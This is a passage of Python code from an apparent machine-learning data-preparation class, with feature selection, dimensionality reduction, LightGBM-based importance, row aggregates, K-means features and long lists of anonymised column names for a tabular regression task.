'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859', 'f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859', 'd2ef684ed', '9e39c29d0', 'f1eeb56ae', '62ffce458', '497adaff8', 'ed1d5d137', 'faf7285a1', 'd83da5921', '0231f07ed', '7950f4c11', '051410e3d', '39e1796ab', '2e0148f29', '312832f30', '6f113540d', 'f3ee6ba3c', 'd9fc63fa1', '6a0b386ac', '5747a79a9', '64bf3a12a', 'c110ee2b7', '1bf37b3e2', 'fdd07cac1', '0872fe14d', 'ddef5ad30', '42088cf50', '3519bf4a4', 'a79b1f060', '97cc1b416', 'b2790ef54', '1a7de209c', '2a71f4027', 'f118f693a', '15e8a9331', '0c545307d', '363713112', '73e591019', '21af91e9b', '62a915028', '2ab5a56f5', 'a8ee55662', '316b978cd', 'f3cf9341c', 'fa11da6df', 'd47c58fe2', '0d5215715', '555f18bd3', '134ac90df', '716e7d74d', 'c00611668', '1bf8c2597', '1f6b2bafa', '174edf08a', 'f1851d155', '5bc7ab64f', 'a61aa00b0', 'b2e82c050', '26417dec4', '53a550111', '51707c671', 'e8d9394a0', 'cbbc9c431', '6b119d8ce', 'f296082ec', 'be2e15279', '698d05d29', '38e6f8d32', '93ca30057', '7af000ac2', '1fd0a1f2a', '41bc25fef', '0df1d7b9a', '88d29cfaf', '2b2b5187e', 'bf59c51c3', 'cfe749e26', 'ad207f7bb', '11114a47a', '341daa7d1', 'a8dd5cea5', '7b672b310', 'b88e5de84', 'fec5644cf', 'caa9883f6', '9437d8b64', '68811ba58', 'ef4b87773', 'ff558c2f2', '8d918c64f', '0b8e10df6', '2d6565ce2', '0fe78acfa', 'b75aa754d', '2ab9356a0', '4e86dd8f3', '348aedc21', 'd7568383a', '856856d94', '69900c0d1', '02c21443c', '5190d6dca', '20551fa5b', '79cc300c7', '8d8276242', 'da22ed2b8', '89cebceab', 'f171b61af', '3a07a8939', '129fe0263', 'e5b2d137a', 'aa7223176', '5ac7e84c4', '9bd66acf6', '4c938629c', 'e62c5ac64', '57535b55a', 'a1a0084e3', '2a3763e18', '474a9ec54', '0741f3757', '4fe8b17c2', 'd5754aa08'] # noqa 501 # features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98'] # noqa 501 if dataset == 'test' or dataset == 'both': new_test_df = self.test_df.filter(items=features) if not return_only: self.test_df = new_test_df if dataset == 'train' or dataset == 'both': features.append('target') new_train_df = self.train_df.filter(items=features) if not return_only: self.train_df = new_train_df if return_only: if dataset == 'train': return new_train_df elif dataset == 'test': return new_test_df elif dataset == 'both': return new_train_df, new_test_df def to_sparse(self, dataset='both', verbose=True): '''Transform datasets to sparse by removing zeros''' if dataset == 'train' or dataset == 'both': if verbose: print('Dense memory usage: train = {}mb'.format( self.train_df.memory_usage().sum() / 1024 / 1024)) self.train_df = self.train_df.replace(0, np.nan) if verbose: print('Sparse memory usage: train = {}mb'.format( self.train_df.memory_usage().sum() / 1024 / 1024)) if dataset == 'test' or dataset == 'both': if verbose: print('Dense memory usage: test = {}mb'.format( self.test_df.memory_usage().sum() / 1024 / 1024)) self.test_df = self.test_df.replace(0, np.nan) if verbose: print('Sparse memory usage: test = {}mb'.format( self.test_df.memory_usage().sum() / 1024 / 1024)) def normalize_data(self, x, fit=True, verbose=True): '''Normalize data taking sparsity into account''' if fit: self.scaler.fit(x) x = self.scaler.transform(x) if verbose: print('Data normalized.') return x def reduce_dimensionality(self, dataset, n_components=None, red_num=None, method='svd', fit=True, normalize=False, verbose=True): '''Reduce #red_num of features from the dataset''' assert method in ['svd', 'srp', 'fa'] if dataset == 'train': x = self.train_df.drop(["target"], axis=1).values if normalize: x = self.normalize_data(x, fit=True) elif dataset == 'test': x = self.test_df.values if normalize: x = self.normalize_data(x, fit=False) if n_components is None: n_components = x.shape[0] - red_num elif n_components == -1: n_components = 'auto' red_num = 'Unkown' else: red_num = x.shape[0] - n_components # When reducing test data fit must be False if fit: if method == 'svd': self.reductor = TruncatedSVD(n_components=n_components) elif method == 'srp': self.reductor = SparseRandomProjection( n_components=n_components) elif method == 'fa': self.reductor = FactorAnalysis(n_components=n_components) self.reductor.fit(x) x = self.reductor.transform(x) if verbose: print(red_num, ' less important features removed.') print('Data new shape: ', x.shape) return x def add_decomposition_as_features(self, dataset='both', n_components=None, method='svd', comp_stats=False, verbose=True, normalize=False): '''Perform feature decomposition and add as an aggregate''' if dataset == 'train' or dataset == 'both': train_agg = self.reduce_dimensionality( dataset='train', n_components=n_components, method=method, fit=True, normalize=normalize, verbose=verbose) train_agg = pd.DataFrame(train_agg, index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if comp_stats: train_agg = compute_row_aggregates(train_agg, prefix='dec') self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = self.reduce_dimensionality( dataset='test', n_components=n_components, method=method, fit=False, normalize=normalize, verbose=verbose) test_agg = pd.DataFrame(test_agg, index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) if comp_stats: test_agg = compute_row_aggregates(test_agg, prefix='dec') self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def get_most_important_features(self, num=50, importance_type='split', random_seed=43): '''Get the column names for the most important features''' assert importance_type in ['split', 'gain'] LightGBM_params = dict(num_leaves=53, lr=0.005, bagging_fraction=0.67, max_depth=8, min_sum_hessian_in_leaf=1e-1, feature_fraction=0.35, bagging_freq=3, min_data_in_leaf=12, use_missing=True, zero_as_missing=True, lambda_l1=0.1, lambda_l2=1, device='cpu', num_threads=8) model = LightGBM(**LightGBM_params) x, y = self.get_train_data(use_aggregates=False) x_train, x_val, y_train, y_val = train_test_split( x, y, test_size=0.2, random_state=random_seed) model.fit(x_train, y_train, x_val, y_val, verbose=0) most_important = model.model.feature_importance( importance_type=importance_type) index = np.argsort(most_important)[-num:] return index def compute_aggregates_for_all_features(self, dataset): '''Compute aggregates for all features''' if dataset == 'train' or dataset == 'both': train_agg = compute_row_aggregates( self.train_df.drop(["target"], axis=1), prefix='global') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = compute_row_aggregates( self.test_df, prefix='global') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_time_series_aggregates(self, dataset): if dataset == 'train' or dataset == 'both': x, _ = self.get_data_as_time_series(dataset='train') for i in range(x.shape[2]): if i > 0: continue df = pd.DataFrame(x[:, :, i], index=self.train_df.index) train_agg = compute_TS_aggregates(df, prefix='ts') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': x = self.get_data_as_time_series(dataset='test') for i in range(x.shape[2]): if i > 0: continue df = pd.DataFrame(x[:, :, i], index=self.test_df.index) test_agg = compute_TS_aggregates(df, prefix='ts') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_aggregates_for_selected_features(self, dataset): '''Compute aggregate features for the hand selected features''' if dataset == 'train' or dataset == 'both': df = self.keep_only_selected_features('train', return_only=True) train_agg = compute_row_aggregates( df.drop('target', axis=1), prefix='hand_picked') # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': df = self.keep_only_selected_features('test', return_only=True) test_agg = compute_row_aggregates( df, prefix='hand_picked') # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_aggregates_for_most_important(self, dataset, num=50, importance_type='split', random_seed=43): '''Compute aggregate features for the most important features''' index = self.get_most_important_features(num, importance_type, random_seed) if dataset == 'train' or dataset == 'both': features = self.train_df.drop('target', axis=1).values[:, index] df = pd.DataFrame(features, index=self.train_df.index) train_agg = compute_row_aggregates( df, prefix='{}_most_important'.format(num)) # Add to aggregates self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': features = self.test_df.values[:, index] df = pd.DataFrame(features, index=self.test_df.index) test_agg = compute_row_aggregates( df, prefix='{}_most_important'.format(num)) # Add to aggregates self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_meta_aggregates(self, dataset='both'): '''Compute aggregate features for the existing aggregate features''' if dataset == 'train' or dataset == 'both': train_agg = compute_row_aggregates( self.train_agg, prefix='meta') self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': test_agg = compute_row_aggregates( self.test_agg, prefix='meta') self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_cluster_features(self, dataset='both', iter_cluster=range(2, 11)): '''Compute cluster centers using K-means''' for n_cluster in iter_cluster: if dataset == 'train' or dataset == 'both': features = self.compute_Kmeans('train', n_cluster, fit=True) train_agg = pd.DataFrame( {'clusterIndex{}'.format(n_cluster): features}, index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if dataset == 'test' or dataset == 'both': features = self.compute_Kmeans('test', n_cluster, fit=False) test_agg = pd.DataFrame( {'clusterIndex{}'.format(n_cluster): features}, index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def compute_Kmeans(self, dataset, n_cluster, fit=True, verbose=True): '''Compute K_means algorithm on data''' if dataset == 'train': X = self.train_df.drop('target', axis=1).values elif dataset == 'test': X = self.test_df.values if fit: self.clusterizer = KMeans(n_clusters=n_cluster, n_jobs=-2) self.clusterizer.fit(X) cluster_index = self.clusterizer.predict(X) # cluster_centers = self.clusterizer.cluster_centers_ # cluster_feat = np.array([cluster_centers[x, :] for x in # cluster_index]) if verbose: print('Clusters inertia: ', self.clusterizer.inertia_) return cluster_index def create_feature_as_targets(self): '''Create new target using arg of the feat closer to target''' for index, row in self.train_df.iterrows(): target = row.pop('target') dists = abs(row.values - target) self.train_df.at[index, 'target'] = np.argmin(dists) def get_gibas_pred(self, dataset='train'): # Need more features!!! Note that if we use if dataset == 'train': data = self.train_df elif dataset == 'test': data = self.test_df features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535'] d1 = data[features[:-2] ].apply(tuple, axis=1).to_frame().rename(columns={0: 'key'}) d2 = data[features[2:]].apply( tuple, axis=1).to_frame().rename(columns={0: 'key'}) d2['pred'] = data[features[0]] d2 = d2[d2['pred'] != 0] # Keep? d3 = d2[~d2.duplicated(['key'], keep='first')] # Need more features! d = d1.merge(d3, how='left', on='key') pred = d.pred.fillna(0) log_pred = np.log1p(d.pred).fillna(0) have_data = log_pred != 0 if dataset == 'train': error = sqrt(mean_squared_error( np.log1p(self.train_df.reset_index().target[have_data]), log_pred[have_data])) print( f'Score={error} on {have_data.sum()} out of {self.train_df.shape[0]} training samples') elif dataset == 'test': print(f'Have predictions for {have_data.sum()} out of {self.test_df.shape[0]} test samples') return pred def get_data_as_time_series(self, dataset='train', logloss=True, round_targets=False): '''Get data as time-series using selected features''' cols = [('f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98'), ('06148867b', '4ec3bfda8', 'a9ca6c2f4', 'bb0408d98', '1010d7174', 'f8a437c00', '74a7b9e4a', 'cfd55f2b6', '632fed345', '518b5da24', '60a5b79e4', '3fa0b1c53', 'e769ee40d', '9f5f58e61', '83e3e2e60', '77fa93749', '3c9db4778', '42ed6824a', '761b8e0ec', 'ee7fb1067', '71f5ab59f', '177993dc6', '07df9f30c', 'b1c5346c4', '9a5cd5171', 'b5df42e10', 'c91a4f722', 'd93058147', '20a325694', 'f5e0f4a16', '5edd220bc', 'c901e7df1', 'b02dfb243', 'bca395b73', '1791b43b0', 'f04f0582d', 'e585cbf20', '03055cc36', 'd7f15a3ad', 'ccd9fc164'), ('0d7692145', '62071f7bc', 'ab515bdeb', 'c30c6c467', 'eab76d815', 'b6ee6dae6', '49063a8ed', '4cb2946ce', '6c27de664', '772288e75', 'afd87035a', '44f2f419e', '754ace754', 'e803a2db0', 'c70f77ef2', '65119177e', '3a66c353a', '4c7768bff', '9e4765450', '24141fd90', 'dc8b7d0a8', 'ba499c6d9', '8b1379b36', '5a3e3608f', '3be3c049e', 'a0a3c0f1b', '4d2ca4d52', '457bd191d', '6620268ab', '9ad654461', '1a1962b67', '7f55b577c', '989d6e0f5', 'bc937f79a', 'e059a8594', '3b74ac37b', '555265925', 'aa37f9855', '32c8b9100', 'e71a0278c'), ('0f8d7b98e', 'c30ff7f31', 'ac0e2ebd0', '24b2da056', 'bd308fe52', '476d95ef1', '202acf9bd', 'dbc0c19ec', '06be6c2bb', 'd8296080a', 'f977e99dc', '2191d0a24', '7db1be063', '1bc285a83', '9a3a1d59b', 'c4d657c5b', 'a029667de', '21bd61954', '16bf5a9a2', '0e0f8504b', '5910a3154', 'ba852cc7a', '685059fcd', '21d6a4979', '78947b2ad', '1435ecf6b', '3839f8553', 'e9b5b8919', 'fa1dd6e8c', '632586103', 'f016fd549', 'c25ea08ba', '7da54106c', 'b612f9b7e', 'e7c0a50e8', '29181e29a', '395dbfdac', '1beb0ce65', '04dc93c58', '733b3dc47'), ('1847c8140', '4adae02ea', '06f44eb79', '63dfd4552', '2a1f6c7f9', 'b3655056c', '7a5460b56', '8909db7d5', 'b0e2acd8e', '7cb53a29a', '5d5c5ce6d', 'a5874086d', '281c556a6', '04fe69e6a', 'e421c414e', '87e6b35f2', '1de239e78', 'c65451871', 'b136976cc', 'baa676f41', '82f194d54', 'f3b9c0b95', '2a83c3267', '802ee804e', '99b88d0fd', 'a257e4bb9', '741684fb0', 'fae0ce474', '16d7bff2b', '0d6d7ec0b', 'bdadd6c34', 'b6623bacf', 'a77b4afa4', '03490ef8c', 'f0aec6c6b', '7b6e769e4', 'ce6349807', '1602cb35d', '279d380ce', '63895c382'), ('18cad608c', '05f1b68b8', '9e0c57b34', '414b74eaa', '3b6f67b0e', '372daeab0', 'ec827621a', '44d132265', '850d3a6f5', '440d789c5', 'e9c45d66f', '615cc4c17', 'ca04a07ca', '4685cc47b', '6cf9184bb', '3dc46e323', '0106dd950', '3855aef1e', 'c9eda7d9c', 'ac308c9a3', '964cd68bc', 'f23b7530c', '7250feb72', '6809065b9', 'c7fd9abc6', '06a1c3b47', '39896d3dd', '10f17bd3e', '6984f4045', 'ed8ff54b5', '42b407f0d', '5509e2e98', 'c593d73e8', 'd3245937e', 'cbeddb751', '0f81cc1d2', '22b3971f5', 'ff3ebf76b', '76a75bd91', '258412544'), ('1ad24da13', '8c5025c23', 'f52a82e7f', 'c0b22b847', 'd75793f21', '4cffe31c7', '6c2d09fb1', 'fb42abc0d', '206ba1242', '62f61f246', '1389b944a', 'd15e80536', 'fa5044e9e', 'a0b0a7dbf', '1ff6be905', '4e06c5c6d', '1835531cd', '68b647452', 'c108dbb04', '58e8e2c82', 'f3bfa96d5', 'f2db09ac3', '4e8196700', '8cd9be80e', '83fc7f74c', 'dbc48d37c', '2028e022d', '17e160597', 'eb8cbd733', 'addb3f3eb', '460744630', '9108ee25c', 'b7950e538', 'a7da4f282', '7f0d863ba', 'b7492e4eb', '24c41bd80', 'fd7b0fc29', '621f71db3', '26f222d6d'), ('1d9078f84', '64e483341', 'a75d400b8', '4fe8154c8', '29ab304b9', '20604ed8f', 'bd8f989f1', 'c1b9f4e76', '4824c1e90', '4ead853dc', 'b599b0064', 'd26279f1a', '58ed8fb53', 'ff65215db', '402bb0761', '74d7998d4', 'c7775aabf', '9884166a7', 'beb7f98fd', 'fd99c18b5', 'd83a2b684', '18c35d2ea', '0c8063d63', '400e9303d', 'c976a87ad', '8a088af55', '5f341a818', '5dca793da', 'db147ffca', '762cbd0ab', 'fb5a3097e', '8c0a1fa32', '01005e5de', '47cd6e6e4', 'f58fb412c', 'a1db86e3b', '50e4f96cf', 'f514fdb2e', '7a7da3079', 'bb1113dbb'), ('20868afc1', 'a46587cda', 'acdef5318', 'a72fcabd8', '21216a0a8', 'dd16bb1ff', '3b8208d28', 'a8c320153', '4a6f8b2c1', 'ac2392a17', '08565b519', '6035df6d8', '4b2316bd5', 'bc3f77679', '51ebff825', '43727fb35', 'c0d363088', 'fd1187d68', '207871d87', '7e0fd6d92', 'f4e243e21', '037a54e89', 'cfa24e4be', 'd7f1f9e52', '6760927a0', '0d8f892fe', '09e395f05', 'bcc18dd40', '0f5fb7fe7', 'f10717d56', '717039eef', '41fb39de4', '965fa6747', '75e55b7a9', 'ff08cfbbe', '9e88cfd02', 'df3ac443c', '7acda93e6', '62e587225', 'd313c892b'), ('2135fa05a', 'e8a3423d6', '90a438099', '7ad6b38bd', '60e45b5ee', '2b9b1b4e2', 'd6c82cd68', '923114217', 'b361f589e', '04be96845', 'ee0b53f05', '21467a773', '47665e3ce', 'a6229abfb', '9666bfe76', '7dcc40cda', '17be6c4e7', 'a89ab46bb', '9653c119c', 'cc01687d0', '60e9cc05b', 'ffcec956f', '51c250e53', '7344de401', 'a15b2f707', 'a8e607456', 'dbb8e3055', '2a933bcb8', 'b77bc4dac', '58d9f565a', '17068424d', '7453eb289', '027a2206a', '343042ed9', 'c8fb3c2d8', '29eddc376', '1c873e4a6', '588106548', '282cfe2ad', '358dc07d0'), ('266525925', '4b6dfc880', '2cff4bf0c', 'a3382e205', '6488c8200', '547d3135b', 'b46191036', '453128993', '2599a7eb7', '2fc60d4d9', '009319104', 'de14e7687', 'aa31dd768', '2b54cddfd', 'a67d02050', '37aab1168', '939cc02f5', '31f72667c', '6f951302c', '54723be01', '4681de4fd', '8bd53906a', '435f27009', 'f82167572', 'd428161d9', '9015ac21d', 'ec4dc7883', '22c7b00ef', 'd4cc42c3d', '1351bf96e', '1e8801477', 'b7d59d3b5', 'a459b5f7d', '580f5ff06', '39b3c553a', '1eec37deb', '692c44993', 'ce8ce671e', '88ef1d9a8', 'bf042d928'), ('2d60e2f7a', '11ad148bd', '54d3e247f', 'c25438f10', 'e6efe84eb', '964037597', '0196d5172', '47a8de42e', '6f460d92f', '0656586a4', '22eb11620', 'c3825b569', '6aa919e2e', '086328cc6', '9a33c5c8a', 'f9c3438ef', 'c09edaf01', '85da130e3', '2f09a1edb', '76d34bbee', '04466547a', '3b52c73f5', '1cfb3f891', '704d68890', 'f45dd927f', 'aba01a001', 'c9160c30b', '6a34d32d6', '3e3438f04', '038cca913', '504c22218', '56c679323', '002d634dc', '1938873fd', 'd37030d36', '162989a6d', 'e4dbe4822', 'ad13147bd', '4f45e06b3', 'ba480f343'), ('32313055b', '1cec80910', 'd5de50af2', 'd08c4204c', 'dbf75ea9f', 'b93c33953', '425c08bf3', '015c3e354', '26419fa97', '0b9a18ebf', 'bbd7e6282', '6fec5a793', 'e4eac6fc5', '99ea04b86', '24292d615', '72ad5471c', '2f489369f', '35d9497eb', '42d321127', '48aa6d627', '94516b63e', '55d7eb6d2', '8dbd95b8d', '1d2df346e', '181e91b1c', '4a29bc92b', '0f14ab429', '22b3a9853', 'defcc2c50', '6a9e2b09d', '42b795e64', 'b65627fab', '7af2b8f44', '1ce5f7bde', 'dd2fc85d7', '013127235', '916d17652', 'a697e9248', '24addf864', 'a63aaf7cc'), ('3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24'), ('3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', 'e234cdc9b', '380d54fad', '7f17e0b2a', '03e726456', '8f66157e3', '556fb6bc0', '2d2114d9b', '215ffb087'), ('3b843ae7e', 'c8438b12d', 'd1b9fc443', '19a45192a', '63509764f', '6b6cd5719', 'b219e3635', '4b1d463d7', '4baa9ff99', 'b0868a049', '3e3ea106e', '043e4971a', 'a2e5adf89', '25e2bcb45', '3ac0589c3', '413bbe772', 'e23508558', 'c1543c985', '2dfea2ff3', '9dcdc2e63', '1f1f641f1', '75795ea0a', 'dff08f7d5', '914d2a395', '00302fe51', 'c0032d792', '9d709da93', 'cb72c1f0b', '5cf7ac69f', '6b1da7278', '47b5abbd6', '26163ffe1', '902c5cd15', '45bc3b302', '5c208a931', 'e88913510', 'e1d6a5347', '38ec5d3bb', 'e3d64fcd7', '199d30938'), ('4302b67ec', '75b663d7d', 'fc4a873e0', '1e9bdf471', '86875d9b0', '8f76eb6e5', '3d71c02f0', '05c9b6799', '26df61cc3', '27a7cc0ca', '9ff21281c', '3ce93a21b', '9f85ae566', '3eefaafea', 'afe8cb696', '72f9c4f40', 'be4729cb7', '8c94b6675', 'ae806420c', '63f493dba', '5374a601b', '5291be544', 'acff85649', '3690f6c26', '26c68cede', '12a00890f', 'dd84964c8', 'a208e54c7', 'fb06e8833', '7de39a7eb', '5fe3acd24', 'e53805953', '3de2a9e0d', '2954498ae', '6c3d38537', '86323e98a', 'b719c867c', '1f8a823f2', '9cc5d1d8f', 'd3fbad629'), ('44df9c106', 'c768b2fbd', 'ca667c723', '1a9b9e2fe', 'e3a41c199', '1529e64f6', '2af3668d1', '85505df26', 'b488b6a67', '4e593c1c5', '47aab5d12', 'b0c596a35', '2127bb611', 'c8c4ef2e5', '665493ecc', '235163358', '932d0f56b', '9ce50845b', 'aca96197c', '74fa547c6', 'b6636b458', '95bbebdd4', 'de0aaf6f4', '7106396d7', 'fb2ab1513', '346c04a64', '5271beb00', 'e8b599c85', 'de5e5b296', '90e069c70', 'a939664aa', 'e8f43b3ab', 'df5f5272a', 'df3cf10bd', '71659d45d', '03b8b1f2d', '860a95ef6', '7f174450b', 'bbbff9657', '1d9b78b9c'), ('4569d5378', '22f05c895', '5fad07863', 'f32763afc', '9bb02469c', '61063fa1c', '4a93ad962', 'fa1efdadd', '4ef309fc3', 'ed0860a34', '6ae0787f3', 'ffd50f0bf', '704e2dc55', '1b1a893f5', 'b19e65a65', '8d4b52f9a', '85dcc913d', '92ba988e1', '6d46740f1', '0aab2f918', '6610f90f1', 'a235f5488', 'c5c073bb0', '13f7f9c70', 'fb6da0420', '73361d959', '783ee6e9a', '635fbbd2c', '60cd556c9', '150504397', 'f3b6dabf7', 'd92ea0b2a', 'b904b8345', '78bc2558b', '4e1a8f6eb', 'c89ae4ce0', 'f2af9300f', 'ca25aad9f', '9d435a85b', '8d035d41e'), ('48b839509', '2b8851e90', '28f75e1a5', '0e3ef9e8f', '37ac53919', '7ca10e94b', '4b6c549b1', '467aa29ce', '74c5d55dc', '0700acbe1', '44f3640e4', 'e431708ff', '097836097', 'd1fd0b9c2', 'a0453715a', '9e3aea49a', '899dbe405', '525635722', '87a2d8324', 'faf024fa9', 'd421e03fd', '1254b628a', 'a19b05919', '34a4338bc', '08e89cc54', 'a29c9f491', 'a0a8005ca', '62ea662e7', '5fe6867a4', '8b710e161', '7ab926448', 'd04e16aed', '4e5da0e96', 'ff2c9aa8f', 'b625fe55a', '7124d86d9', '215c4d496', 'b6fa5a5fd', '55a7e0643', '0a26a3cfe'), ('5030aed26', 'b850c3e18', '212efda42', '9e7c6b515', '2d065b147', '49ca7ff2e', '37c85a274', 'ea5ed6ff7', 'deabe0f4c', 'bae4f747c', 'ca96df1db', '05b0f3e9a', 'eb19e8d63', '235b8beac', '85fe78c6c', 'cc507de6c', 'e0bb9cf0b', '80b14398e', '9ca0eee11', '4933f2e67', 'fe33df1c4', 'e03733f56', '1d00f511a', 'e62cdafcf', '3aad48cda', 'd36ded502', '92b13ebba', 'f30ee55dd', '1f8754c4e', 'db043a30f', 'e75cfcc64', '5d8a55e6d', '6e29e9500', 'c5aa7c575', 'c2cabb902', 'd251ee3b4', '73700eaa4', '8ab6f5695', '54b1c1bc0', 'cbd0256fb'), ('50603ae3d', '48282f315', '090dfb7e2', '6ccaaf2d7', '1bf2dfd4a', '50b1dd40f', '1604c0735', 'e94c03517', 'f9378f7ef', '65266ad22', 'ac61229b6', 'f5723deba', '1ced7f0b4', 'b9a4f06cd', '8132d18b8', 'df28ac53d', 'ae825156f', '936dc3bc4', '5b233cf72', '95a2e29fc', '882a3da34', '2cb4d123e', '0e1921717', 'c83d6b24d', '90a2428a5', '67e6c62b9', '320931ca8', '900045349', 'bf89fac56', 'da3b0b5bb', 'f06078487', '56896bb36', 'a79522786', '71c2f04c9', '1af96abeb', '4b1a994cc', 'dee843499', '645b47cde', 'a8e15505d', 'cc9c2fc87'), ('509e911f0', '9c36a77b3', '50aaba7f1', 'ed5af35f0', 'ffd2f9409', 'd6a122efd', '30768bc79', '9161061c9', '1fbbd4edf', '9a179ed71', '6a055c4fb', '61efa1e29', 'e171bccbe', 'd7cdd8aef', 'd168174c7', 'b791ce9aa', '1a82869a6', '3696a15a7', '7b31055f1', 'a76ad8513', '82ba7a053', '37426563f', 'ba5bbaffc', 'd3022e2f1', '0ccd5ff1c', '31a3f920c', '86eb6ec85', '38df6c628', 'f1fbe249b', '6d0d72180', '22dbe574a', '5860d7fa9', '455f29419', 'f269ec9c8', '75aad4520', '18c0b76e9', 'dae4d14b4', '0cad4d7af', '1e1cb47f3', '9d6410ef5'), ('51c141e64', '0e348d340', '64e010722', '55a763d90', '13b54db14', '01fdd93d3', '1ec48dbe9', 'cf3841208', 'd208491c8', '90b0ed912', '633e0d42e', '9236f7b22', '0824edecb', '71deb9468', '1b55f7f4d', '377a76530', 'c47821260', 'bf45d326d', '69f20fee2', 'd6d63dd07', '5ab3be3e1', '93a31829f', '121d8697e', 'f308f8d9d', '0e44d3981', 'ecdef52b2', 'c69492ae6', '58939b6cc', '3132de0a3', 'a175a9aa4', '7166e3770', 'abbde281d', '23bedadb2', 'd4029c010', 'fd99222ee', 'bd16de4ba', 'fb32c00dc', '12336717c', '2ea42a33b', '50108b5b5'), ('53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369'), ('53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', 'f81908ca5', '947c7c3e8', '8160230fd', 'c2d200f0e', 'c99902a93', 'd3a6362c5', 